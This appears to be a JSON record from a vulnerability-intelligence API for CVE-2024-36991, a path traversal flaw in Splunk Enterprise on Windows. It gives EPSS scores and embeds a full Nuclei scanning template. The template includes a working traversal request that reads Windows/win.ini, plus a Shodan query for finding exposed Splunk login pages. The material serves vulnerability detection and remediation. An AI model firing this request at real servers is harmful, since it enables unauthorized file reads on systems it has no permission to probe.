{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-36991/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-36991/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-36991/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-36991/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-36991/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-36991"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-36991"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.13006,
      "kev": false,
      "percentile": 0.9619
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-36991.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2024-36991\n\ninfo:\n  name: Splunk Enterprise - Local File Inclusion\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.\n  impact: |\n    Attackers can perform path traversal to access sensitive filesystem locations on Splunk Enterprise for Windows.\n  remediation: |\n    Update Splunk Enterprise to version 9.2.2, 9.1.5, or 9.0.10 or later.\n  reference:\n    - https://x.com/sheikhrishad0/status/1809210005125746880/photo/1\n    - https://x.com/chybeta/status/1809249794122215557/photo/1\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-36991\n  classification:\n    epss-score: 0.13006\n    epss-percentile: 0.9619\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"Login | Splunk\"\n  tags: cve,cve2024,splunk,lfi,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /en-US/login HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Splunk Inc.\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"bit app support\"\n          - \"fonts\"\n          - \"extensions\"\n        condition: and\n# digest: 4a0a00473045022100dd983184609d7c722c78b8519f24fd768f94af9d65a8e17421f00d894dc9954d02205c35deb68eb127d564e98f2deb34b4391a6f6b35e6453f76a93bb6e15ac23363:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-36991"
}